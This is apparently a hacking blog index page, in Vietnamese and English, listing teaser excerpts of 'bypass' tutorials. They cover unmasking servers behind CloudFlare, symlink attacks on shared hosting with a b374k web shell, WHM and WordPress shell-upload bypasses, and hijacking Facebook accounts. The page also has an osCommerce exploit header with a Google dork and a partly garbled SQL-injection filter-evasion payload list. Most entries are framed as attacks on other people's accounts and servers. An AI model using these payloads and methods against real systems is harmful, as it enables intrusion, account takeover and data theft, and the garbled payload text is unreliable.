Truy tìm IP thật của server đằng sau CloudFlare hay các dịch vụ CDN

Guide này nhằm giúp các System Admin nhận ra được rằng mình "misconfiguration" ở đâu khiến hệ thống bị lộ real IP khiến các kẻ tấn công DDoS dễ dàng tấn công hệ thống mà bỏ qua các lớp CDN bảo vệ.

CloudFlare IP

Đầu tiên ta cần phải biết danh sách IP của cloudflare (CloudFlare IP) là những IP nào để biết rằng IP tìm được bằng các phương pháp dưới đây là IP thật của server (real IP). Danh sách CloudFlare IP được hãng này public tại đây: https://www.cloudflare.com/ips
Các CDN khác thì tìm trên internet :)

READ MORE »

[Tutorial] Bypass Folder Defence by using "Force copy" method

Áp dụng được với một số phần mềm bảo vệ thư mục, tệp tin.

Công cụ sử dụng: PowerTool - a free anti-virus&rootkit utility.

Download: http://link5s.com/juD

Bằng cách sử dụng phương pháp "Force copy" của PowerTool, chúng ta có thể lấy được dữ liệu đã được bảo vệ ra một thư mục "không được bảo vệ" để truy cập và sử dụng bình thường!

How to access blocked websites?

1. Using IP instead of URL

2. Redirection with short URL service

3. Google cache

Search engines like Google and Yahoo cache webpages and these cached pages are stored in search engines themselves, which likely will be added to the blocked list. Click on the ‘cache’ will bring you to a cache version of the page, as updated as how Google caches it.

4. Internet Archive – Wayback Machine

Wayback Machine is a internet service that periodically keeps a copy of almost all websites in the Internet way from the date they’re started. Clicking on the latest copy of what Wayback Machine have should be somewhat similar to the real site.

READ MORE »

How to bypass Facebook photo tag verification or identify photos of your friends

Okay so i am gonna show you guys a little trick to bypass the Facebook Verification (Verify Images).

READ MORE »

How to bypass age restriction on Youtube?

Video sử dụng làm demo trong bài viết này:

http://www.youtube.com/watch?v=ngPNKXHQe0c

Cách 1:
Các bạn có thể bypass bằng cách sửa lại URL theo cấu trúc sau:

http://www.youtube.com/v/VIDEO_ID

Ví dụ:

http://www.youtube.com/v/ngPNKXHQe0c

Tức là các bạn thay đoạn watch?v= thành v/.

READ MORE »

Bypass Facebook Security Jacking Method

Ever since I had been problems constantly having to deal with Facebook leaving me out off people's accounts I began to think that I should write over my experiences to help others.

I will go over specific techniques and ideas to eventually grant you entrance to their accounts without having to deal with that Facebook problem having logging in from different location.

1st. Before you even begin reading this, you must already have their passwords or e-mails. If not, I will tell you a few ideas of how to acquire them.

READ MORE »

Bypass Symlink Work 100% By Mauritania Attacker Private!

Bypass Symlink Work 100% By Mauritania Attacker Private!

You can Bypass any server with this method you just need to do some little changes in the following file :

* php.ini

* and bypass suEXEC

For example i have this simple "php.ini" 

safe_mode = Off
disable_functions =
safe_mode_gid = Off
open_basedir = Off
register_globals = on
exec = On
shell_exec = On

READ MORE »

BYPASS WHM AUTHENTICATION OF RESELLER

Hie :)

Today We are Going to Bypass WHM Authentication of Reseller Accounts!

For This We Need Shell On The Reseller Account!! i.e Shell On Reseller's Domain!

Note 1:
For Identification of Reseller Account ! We have 2 Page in "Public_html" Dir With Name "moving.page" And "suspended.page"


READ MORE »

Bypass Symlink on Linux Servers by Sen Hacker

Hello Every One Now I Manoj Nath and I am going to share the Sen Haxor's Tutorial on Bypassing Symlink on 2013 Linux servers :)

Hi Guys this is Sen.

Today i gonna Explain how to bypass Symlink on 2013 Server With Different .htaccess and Methods.

So Lets Get Started :)

Note : This method is not applicable for Godaddy , Bluehost , Hostgrator and Hostmonstor Servers.

READ MORE »

Server Bypass via Symlink - Jumping in server

As we all know, symlinking it's on of greates methods for bypassing server security, mean to read files of other site in same shared host.

For getting success with this tutorial are required the following things:

• Python Installed on Server

• b374k.php shell

• And some scripts u will see below.

This idea have start from devilzc0de geeks and let me explain how it work.

READ MORE »

Master Sql Cheet With Waf sheets

SQLi filter evasion cheat sheet (MySQL)
Basic filter

Comments
'Or 1 = 1 #
'Or 1 = 1 -
'Or 1 = 1 / * (MySQL <5.1)
'Or 1 = 1;
'Or 1 = 1 union select 1.2 as `
'Or # newline
1 = '1
'Or--newline
1 = '1
'/ *! 50000or * / 1 = '1
'/ *! Hay * / 1 = '1

Prefixes
+ - ~!
'Or - +2 = -!!! '2

Operators
^, =,! =,%, /, *, &, &&, | |, | |,, >>, <=, <=,,, XOR, DIV, LIKE, SOUNDS LIKE, RLIKE, REGEXP, Least, Greatest , CAST, CONVERT, IS, IN, NOT, MATCH, AND, OR, BINARY, BETWEEN, ISNULL

READ MORE »

How I Hacked Any Facebook Account... Again!

This is my second post regarding Facebook OAuth Vulnerabilities,

just to clarify there is no need for any installed apps on the victim's account, Even if the victim has never allowed any application in his Facebook account I could still get full permission on his account via Facebook Messenger app_id (This bug works on any browser),
READ MORE »

Bypassing Google Two Factor Authentication

Duo Security found a loophole in Google's authentication system that allowed them to Google's two factor authentication and gain full control over a user's Gmail account by abusing the unique passwords used to connect individual applications to Google accounts.

READ MORE »

WORDPRESS SHELL UPLOAD BYPASS

METHOD GIVEN BY MY DEAR FRIEND MAURITANIA ATTACKER TO BYPASS SHELL UPLOAD IN WORDPRESS

LET'S START
READ MORE »

Bypass CloudFlare Video

osCommerce Authentication Bypass (misconfigured htaccess)

#Exploit Title : osCommerce Authentication Bypass (misconfigured htaccess)
#Google Dork : "Powered by osCommerce" or you can try own dorks
#Exploit Author: D35m0nd142
#Vendor Homepage: http://www.oscommerce.com/
#Tested on: Linux Ubuntu 12.04 with Firefox 17.0
#Version: This exploit works on old versions of osCommerce

READ MORE »

403 Forbidden and cant read /etc/named.conf Error Bypass

This Tut has been submitted by Sen Haxor

Now days most of the 2012 Linux Kernel server show this error when you try to symlink the server . Most of the server which shows 403 forbidden has cant read named.config error when you try to symlink using scripts like Symlink_Sa or Madspot Security Team Shell or what ever script used for Automated Symlink .
READ MORE »

FCKEditor ASP Version 2.6.8 File Upload Protection Bypass

- Title: FCKEditor 2.6.8 ASP Version File Upload Protection bypass

- Credit goes to: Mostafa Azizi, Soroush Dalili

- Link:http://sourceforge.net/projects/fckeditor/files/FCKeditor/

- Description:

There is no validation on the extensions when FCKEditor 2.6.8 ASP version is

dealing with the duplicate files. As a result, it is possible to bypass

the protection and upload a file with any extension.

- Reference: http://soroush.secproject.com/blog/2012/11/file-in-the-hole/

- Solution: Please check the provided reference or the vendor website.

READ MORE »

Facebook sửa lỗi bypass Password

Facebook vừa sửa lỗ hổng bảo mật vào cuối tuần qua và cho rằng nó có thể bị khai thác và có thể có trên 1 triệu tài khoản sẽ bị đăng nhập trái phép nếu không xác thực kịp thời
READ MORE »